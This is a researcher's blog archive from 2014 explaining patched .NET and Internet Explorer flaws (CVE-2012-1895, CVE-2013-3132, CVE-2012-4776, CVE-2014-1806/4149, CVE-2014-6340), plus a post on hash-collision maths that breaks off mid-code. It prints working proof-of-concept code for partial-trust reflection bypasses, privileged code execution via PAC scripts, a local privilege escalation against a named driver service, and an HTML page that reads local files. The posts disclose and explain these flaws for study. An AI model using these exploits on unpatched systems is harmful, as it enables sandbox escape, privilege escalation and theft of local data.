Monday, 15 December 2014

Old .NET Vulnerability #2+3: Reflection Delegate Binding Bypass (CVE-2012-1895 and CVE-2013-3132)

Reflection is a very useful feature of frameworks such as .NET and Java, but it has interesting security issues when you're trying to sandbox code. One which is well known is how much the framework will try to emulate the normal caller visibility scoping for reflection APIs which would exist if the code was compiled. Perhaps that needs a bit of explanation, imagine you have a C# class which looks something like the following:
public class UnsafeMemory {
   IntPtr _ptr;
   ushort _size;

   public UnsafeMemory(ushort size) {
       _ptr = Marshal.AllocCoTaskMem(size);
       _size = size;
   }

   public byte ReadByte(ushort ofs) {
       if (ofs < _size) {
             return Marshal.ReadByte(_ptr, ofs);
       }

       return 0;
   }
}

This has a sensitive field, a pointer to a locally allocated memory structure which we don't want people to change. The built-in accessors don't allow you to specify anything other than size (which is also sensitive, but slightly less so). Still reflection allows us to change this from a fully trusted application easily enough:
UnsafeMemory mem = new UnsafeMemory(1000);
FieldInfo fi = typeof(UnsafeMemory).GetField("_ptr", 
                  BindingFlags.NonPublic | BindingFlags.Instance);

fi.SetValue(mem, new IntPtr(0x12345678));

As we've set the pointer, we can now read and write to arbitrary memory addresses. Flushed with success we try this in our partially trusted application and we get:
System.FieldAccessException: Attempt by method 
             ReflectionTests.Program.Main()' to 
             access field 'ReflectionTests.UnsafeMemory._ptr' failed.
   at System.Reflection.RtFieldInfo.PerformVisibilityCheckOnField()
   at System.Reflection.RtFieldInfo.InternalSetValue()
   at System.Reflection.RtFieldInfo.SetValue()
   at System.Reflection.FieldInfo.SetValue()
   at ReflectionTests.Program.Main()

Well that sucks! PerformVisibilityCheckOnField is implemented by the CLR so we can't easily look at it's implementation (although it's in the SSCLI). But I think we can guess what the method is doing. The CLR is checking who's calling the SetValue method and verifying the visibility rules for the field. As the field is private only the declaring class should be able to set it via reflection, we can verify that easily enough. Let's modify the class slightly to add a new method:
public static void TestReflection(FieldInfo fi, object @this, object value) {
    fi.SetValue(@this, value);
}

If we call that method from our partial trust code it succeeds, thus confirming our assumptions about the visibility check. This can be extended to any reflection artefact, properties, methods, constructors, events etc. Still the example method is hardly going to be a very common coding pattern, so instead let's think more generally about visibility in the .NET framework to see if we can find a case where we can easily bypass the visibility.  There are actually many different visibility levels in the CLR which can be summarised as:
Name in CLR Name in C# Visibility
Public public Anybody
Family protected Current class and derived classes
FamilyAndAssembly No Equivalent Current class or derived classes in same assembly
FamilyOrAssembly protected internal Current class and derived classes or assembly
Assembly internal Current assembly
Private private Current class

Of most interest is Assembly (or internal in C#) as you only have to take a quick peek at something like mscorlib to see that this visibility is used a lot to protect sensitive classes and methods by localizing them to the current assembly. The Assembly visibility rule means that any class in the same assembly can access the field or method. When dealing with something like mscorlib, which has at least 900 public classes you can imagine that would give you something you could exploit. Turns out a good one to look at is the handling of delegates, if only for one reason, you can get them to call a method with the caller set to a something in mscorlib, by using asynchronous dispatch.

For example if we run the following code we can get the calling method from the delegate, this correctly removes methods which the CLR considers to be part of the delegate dispatch.
Func<MethodBase> f = new Func<MethodBase>(() => 
              new StackTrace().GetFrame(1).GetMethod());
MethodBase method = f();

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: ReflectionTests.Program::Main

Not really surprising, the caller was our Main method. Okay now what if we change that to using asynchronous dispatch, using BeginInvoke and EndInvoke?
Func<MethodBase> f = new Func<MethodBase>(() => 
      new StackTrace().GetFrame(1).GetMethod());

IAsyncResult ar = f.BeginInvoke(null, null);
MethodBase method = f.EndInvoke(ar);

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: System.Runtime.Remoting.Messaging.StackBuilderSink::_PrivateProcessMessage

How interesting, the code thinks the caller's an internal method to mscorlib, hopefully you can see where I'm going with this? Okay let's put it all together, lets create a delegate pointing to FieldInfo.SetValue, call it via asynchronous dispatch and it's time to party.
Action<object, object> set_info = new Action<object,object>(fi.SetValue);

IAsyncResult ar = set_info.BeginInvoke(mem, new IntPtr(0x12345678), null, null);
set_info.EndInvoke(ar);

This works as expected with full trust but running it under partial trust we get the dreaded SecurityException
System.Security.SecurityException: Request for the permission 
       of type 'System.Security.Permissions.ReflectionPermission' failed.
   at System.Delegate.DelegateConstruct()
   at ReflectionTests.Program.Main()

So why is this the case. Well the developers of .NET weren't stupid, they realised being able to call a reflection API using another reflection API (which delegates effectively are) is a security hole waiting to happen. So if you try and bind a delegate to certain set of methods it will demand ReflectionPermission first to check if you're allowed to do it. Still while I said they weren't stupid, I didn't mean they don't mistakes as this is the crux of the two vulnerabilities I started writing this blog post about :-)

The problem comes down to this, what methods you can or cannot bind to are just a black-list. Each method is allocated a set of invocation flags represented by the System.Reflection.INVOCATION_FLAGS enumeration. Perhaps the most important one from our perspective is the INVOCATION_FLAGS_FIELD_SPECIAL_CAST flag. This is a bit strangely named, but what this indicates is the method should be double checked if it's ever invoked through a reflection API. If we look at FieldInfo.SetValue we'll find it has the flag set.

Okay so the challenge is simple, just find a method which is equivalent to SetValue but isn't FieldInfo.SetValue. It turns out that FieldInfo implements the interface System.Runtime.InteropServices._FieldInfo which is a COM interface for accessing the FieldInfo object. It just so happened that someone forgot to add this interface's methods to the blacklist. So let's see a real PoC by abusing the WeakReference class and its internal m_handle field:
// Create a weak reference to 'tweak'
string s = "tweakme";
WeakReference weakRef = new WeakReference(s);

// Get field info for GC handle
FieldInfo f = typeof(WeakReference).GetField("m_handle", 
                BindingFlags.NonPublic | BindingFlags.Instance);

MethodInfo miSetValue = typeof(_FieldInfo).GetMethod("SetValue", 
        BindingFlags.Public | BindingFlags.Instance, null, 
 new Type[2] { typeof(object), typeof(object) }, null);

Action<object, object> setValue = (Action<object, object>)
        Delegate.CreateDelegate(typeof(Action<object, object>),
 f, miSetValue);

// Set garbage value in handle
setValue.EndInvoke(setValue.BeginInvoke(weakRef, 
         new IntPtr(0x0c0c0c0c), null, null));

// Crash here read AV on 0x0c0c0c0c
Console.WriteLine(weakRef.Target.ToString());

CVE-2014-1895 described the issue with all similar COM interfaces, such as _MethodInfo, _Assembly, _AppDomain. So I sent it over to MS and it was fixed. But of course even though you point out a security weakness in one part of the code it doesn't necessarily follow that they'll fix it everywhere. So a few months later I found that the IReflect interface has an InvokeMember method which was similarly vulnerable. This ended up as CVE-2013-3132, by that point I gave up looking :-)

As a final note there was a similar issue which never got a CVE, although it was fixed. You could exploit it using something like the following:
MethodInfo mi = typeof(Delegate).GetMethod("CreateDelegate", 
    BindingFlags.Public | BindingFlags.Static, 
    null, new Type[] { typeof(Type), typeof(MethodInfo) }, null);

Func<Type, MethodInfo, Delegate> func = (Func<Type, MethodInfo, Delegate>)
           Delegate.CreateDelegate(typeof(Func<Type, MethodInfo, Delegate>), mi);
                
Type marshalType = Type.GetType("System.Runtime.InteropServices.Marshal");
MethodInfo readByte = marshalType.GetMethod("ReadByte", 
    BindingFlags.Public | BindingFlags.Static,
    null, new Type[] { typeof(IntPtr) }, null);

IAsyncResult ar = func.BeginInvoke(typeof(Func<IntPtr, byte>), readByte, null, null);
Func<IntPtr, byte> r = (Func<IntPtr, byte>)func.EndInvoke(ar);

r(new IntPtr(0x12345678)); 

It's left as an exercise for the reader to understand why that works (hint: it isn't a scope issue as Marshal.ReadByte is public). I'll describe it in more detail next time.

Sunday, 30 November 2014

Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration scripts (PAC). It was one of the only times that MS has ever credited me with a RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy but all Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well but the crucial thing to bear in mind is the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
 // Always return no proxy setting
 return "DIRECT";
}
On Windows if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you'd be on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.

While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
    try
    {
        engine = new VsaEngine();
        engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
        engine.Site = new VsaEngineSite(helperType);
        engine.InitNew();
        engine.RootNamespace = "__WebProxyScript";

        StringBuilder sb = new StringBuilder();
        sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
        sb.Append("class __WebProxyScript { ... }\r\n");
        sb.Append(scriptBody);
        IVsaCodeItem item2 = engine.Items.CreateItem("SourceText", 
                   VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
        item2.SourceText = sb.ToString();

        if (engine.Compile())
        {
            engine.Run();
            scriptInstance = Activator.CreateInstance(
                 engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
            CallMethod(scriptInstance, "SetEngine", new object[] { engine });
            return true;
        }
    }
    catch
    {
    }
    return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boiler plate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
  <system.net>
    <defaultProxy>
   <proxy
  autoDetect="true"
  scriptLocation="http://127.0.0.1/test.js"
   />
    </defaultProxy>
  </system.net>
</configuration
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD, which is known to be spoofable or the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it. With a test harness ready let's try a few things:
import System;

function FindProxyForURL(url, host) {
 Console.WriteLine("Hello World!");
 return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and executing JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
 File.WriteAllText("test.txt", "Hello World!");
 return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET frameworks come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial, open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and adds a handler to load the SOS library when the DLL mscorwks gets loaded. This DLL is the main part of the CLR, we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. 

Looking at the class it confirms our suspicions of being run in PT. In the class' CreateAppDomain method it creates an Internet security AppDomain which is going to be pretty limited in permissions then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still in situations like this you shouldn't be disheartened, let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well you have to remember how security in AppDomains interact with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram:



There are plenty of ways around this situation, in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue, all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) { 
 return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but it's transparent to security decisions. If you have a trusted assembly which is transparent it doesn't effect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to finding the code in the first place.

Microsoft fixed this in two ways, first they "fixed" the JScript code to not execute under a privileged permission set as well as passing an appropriate evidence object to the Assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Monday, 24 November 2014

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basics of .NET remoting is you have a server class which is derived from the MarshalByRefObject class.  This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the Client. When the Client makes a call on this proxy the method information and parameters is packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that I can be sent across the transport. It's also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sinks, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.

The StackBuilder sink is an internal only class implemented by the framework for the server. It's job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, calling the server and finally packaging up the return value into the IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
     set = new PermissionSet(PermissionState.None);
     set.SetPermission(
           new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
    if (set != null)
    {
        set.PermitOnly();
    }
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, 
               _strictBinding, TypeFilterLevel);
}
finally
{
    if (set != null)
    {
         CodeAccessPermission.RevertPermitOnly();
    }
}
We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri, 
              Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
    BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
    formatter.FilterLevel = securityLevel;
    UriHeaderHandler handler = new UriHeaderHandler(objectUri);
    return (IMessage) formatter.UnsafeDeserialize(inputStream, 
              new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug, it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker could return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) as some points it will trick the server into dispatching the call. Now once the StackBuilder sink goes to dispatch the method we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code to execute in the remoting service.

In order to actually exploit this you pretty much need to implement most of the remoting code manually, fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommand taking a look at the github project for more information on how this all works.

So that was  CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug, MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM Interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as they you don't need to worry so much about COM authentication but it should work remotely. The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject is derived from that class as well as transparent proxies.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflecting object tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client it ends up staying in the server as a remote object.

Real-World Example

Okay let's see this in action in a real world application. I bought a computer a few years back which had pre-installed the Intel Rapid Storage Technology drivers version 11.0.0.1032 (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue, from what I can tell the latest versions of these drivers no longer uses .NET remoting for the communication between the user client and the server so I've never contacted Intel about the issue. That said there's no automatic update process so if, like me you had the original insecure version installed well you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
    BinaryServerFormatterSinkProvider serverSinkProvider
        new BinaryServerFormatterSinkProvider {
           TypeFilterLevel = TypeFilterLevel.Full
    };
    BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
    IdentityReferenceCollection groups = new IdentityReferenceCollection();

    IDictionary properties = new Hashtable();
    properties["portName"] = "ServerChannel";
    properties["includeVersions"] = "false";
    mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
    ChannelServices.RegisterChannel(mChannel, true);
    mServerRemotingRef = RemotingServices.Marshal(mServer,
        "Server.rem", typeof(IServer));
    mEngine.Start();
}

So there's a few thing to note about this code, it is using IpcChannel so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel, this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the known name of Server.rem which will be exposed on the channel. Also worth nothing it is setting the TypeFilterLevel to Full, we'll get back to that in a minute.

For exploitation purposes therefore we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149 so we need to pass the -usecom flag to use a COM return channel.


Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug, at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting, MS has deprecated the technology for WCF, but it isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. 


Tuesday, 11 November 2014

When's document.URL not document.URL? (CVE-2014-6340)

I don't tend to go after cross-origin bugs in web browsers, after all XSS* is typically far easier to find (*disclaimer*  I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case, most web browsers don't make much of a distinction between origins for security purpose but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when it interacts with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "Site" object which represents the container of the ActiveX control. This might be through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. When passed the site object the well know way of getting the hosting page's URL is to call IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;

pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;

pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;

pHtmlDoc->get_URL(&bstrURL);

// We now have the hosting URL.

Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's at the native code level so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri. But what's most interesting was if this returned successfully it exited the function with a successful return code. Of course if you look at the code flow it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well annoyingly 0x31 is hardly a rare number so doing an immediate search in IDA was a pain, still eventually I found where you could set it, it was in the IHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document's currently a HTML document or a Print template. It turns out this is an old property which probably should never be used, but is one of those things which's kept around for legacy purposes. As long as you convert the current document to a print template using the OLECMDID_SETPRINTTEMPLATE command to ExecWB on the web browser this code path will execute. 

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri



Hmm well it seems to be reading the attribute __IE_DisplayURL from the top element of the document and retuning that as the URL. Okay let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>
PoC for IE_DisplayURL Issue</h1>
<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
 // Set document to a print template
 var wb = document.getElementById("obj").object;
 wb.ExecWB(51, 0, true);

 // Enable print media mode
 document.media = "print";

 // Read a local file
 var x = new ActiveXObject("msxml2.xmlhttp");
 x.open("GET", "file:///c:/windows/win.ini", false);
 x.send();
 alert(x.responseText);

 // Disable again to get scripting back (not really necessary)
 document.media = "screen";

} catch(e) {
 alert(e.message);
}
</script>
</body>
</html>
This example only work when running in the Intranet Zone because it requires the ability to script the web browser. Can it be done from Internet Zone? Probably ;-) In the end Microsoft classed this as an Information Disclosure, but is it? Well probably in a default installation of Windows. But mix in third-party ActiveX controls you have yourself the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)

Tuesday, 14 October 2014

A Tale of Two .NET Methods

Sometimes the simplest things amuse me. Take for example CVE-2014-0257 which was a bug in the way DCOM was implemented in .NET which enabled an Internet Explorer sandbox escape. Via the DCOM interface you could call the System.Object.GetType method then command the reflection APIs to do anything you like, such as popping the calculator. The COM interface, _Object, which exposed the GetType method only has 4 functions on it, it seemed pretty unlucky that 25% of the interface had a security vulnerability. Still Microsoft fixed this bug and all's well with the world. Then again if you were lucky enough to see any of my IE11 sandbox presentations you might have seen the following slide, although briefly:

Why would I point out the Equals method as well? Well because it also has a bug, one so difficult to fix that basically Microsoft has throw up its hands and given up on Managed DCOM. They've mitigated the issue in the OneClick deployment service (CVE-2014-4073) by reimplementing the DCOM object in native code, but as far as I'm aware they've not fixed the underlying issue.

To understand the problem we have to go back to CVE-2014-0257 and understand why it worked. When the GetType method returns a System.Type instance over DCOM it wraps the object in a COM Callable Wrapper (CCW). This looks to the COM infrastructure as a normal pass-by-reference object so the Type instance stays in the original process (say the ClickOnce service) but exposes the remote COM interfaces to the caller. The Type class is marked as Serializable so why doesn't the CCW implement IMarshal and custom-marshal the object to the caller? It would be a pretty rude thing to do, It would force the CLR to be loaded into a process just because it happened to be communicating with a .NET DCOM server.

If you implement similar code in C# though things change. The result of calling GetType is a local instance of the Type class. How does .NET know how to do this? This is where the IManagedObject interface gets involved. Every CCW implements the IManagedObject interface which has two methods, GetObjectIdentity which is used to determine if the object exists in the same AppDomain and GetSerializedBuffer which, well, I guess the name describes itself.

When a .NET client receives a COM object it tries to see if it's really a .NET object in disguise. To do this it calls QueryInterface for IManagedObject, if that succeed it will then call GetObjectIdentity to see if it's already in the same AppDomain (if so it can just call it directly). Finally it will call GetSerializedBuffer, if the wrapped .NET object is Serializable it will receive a serialized version of the object which it can recreate using the BinaryFormatter class. Yes that BinaryFormatter class.

Oh crap!

This of course works in reverse, if a COM client passes a .NET object to a DCOM server it can cause arbitrary BinaryFormatter deserialization in the server. The Equals method will accept any object by design. So by passing a malicious serializable .NET object to Equals you can end up doing fun things like reflecting an arbitrary Delegate over the DCOM interface. As you can imagine that's bad.

At this point I'll direct you the exploit code, which should make everything clearer, or not. There's actually a lot more to the exploit than it seems :-)

Sunday, 14 September 2014

Hash Collisions of the Non-Cryptographic Kind

Recently I had a bug which required me to create a hash collision between two strings. Fortunately it wasn't a cryptographically secure hashing algorithm, it was only used in a hash table. The algorithm itself was pretty simple, as shown below:
int hash(const char* c, size_t len) {
 int h = 0;

 while (len > 0) {
   h = h * 31 + *c++;
   len--;
 }

 return h;
}

I had one string, say "abc" which I needed to have the same hash as "xyz". As this code was written in C all string comparisons were performed using the standard C string functions. Therefore from a comparison point of view the strings "abc", "abc\0efgh" etc. are equivalent as the comparison function would terminate at the NUL. However because the hashing algorithm takes the entire string including any NUL characters their hash values are not equal. This makes it possible to create a string with the following properties:

char* s = "abc\0"+SUFFIX;
strcmp(s, "abc") == 0

and

H(s) != H("abc")
H(s) == H("xyz")

To generate the collision you might be tempted to try brute force, well good luck with that. Being one for pointless pop culture references I recalled the Exorcist, and realized "The Power of Maths Compels You...", isn't that what the film's about?

On second thoughts perhaps it's about something else entirely?
Clearly Maths holds the key to calculating the hash collision. I had free reign on the characters I could choose to generate the collision which makes it simpler. The key is realising what the hashing algorithm actually does. If you expand out to the original code you get something like the following, where S is the string and N is the length of the string.

h = S[0]*31^N-1 + S[1]*31^N-2 + ... + S[N-1]

Does that look familiar? No? Well What if I changed the value 31 to 2 giving:

h = S[0] << N-1 + S[1] << N-2 + ... + S[N-1] << 0

Look more familiar? It turns out all the hashing algorithm is doing is generating a base31 number. Therefore finding a hash collision mathematically is going to be pretty simple. All we need to do is calculate the hash of the string with a dummy suffix, calculate the difference between the hash of the string with the suffix and the destination hash and finally generate a replacement suffix with that value in base31. So for completeness here's my code in C++.

#include <stdio.h>
#include <string>
#include <iostream>
using namespace std;

int H(int h, const string& s) {
  for (char c : s) {
    h = h * 31 + c;
  }
  return h;
}

string collide(const string& target_str, const string& base_str) {
  // Initialize suffix with all zeros
  string suffix(8, 0);

  int target_hash = H(0, target_str);
  int base_hash = H(H(0, base_str), suffix);

  unsigned int diff = target_hash - base_hash;

  for(int i = 7; i > 1; --i) {
    suffix[i] = diff % 31;
    diff /= 31;
  }

  suffix[1] = diff;

  return base_str + suffix;
}

int main() {
  string a = "xyz";
  string b = "abc";
  string c = collide(a, b);

  cout << H(0, a) << " " << H(0, b) << " " << H(0, c) << endl;
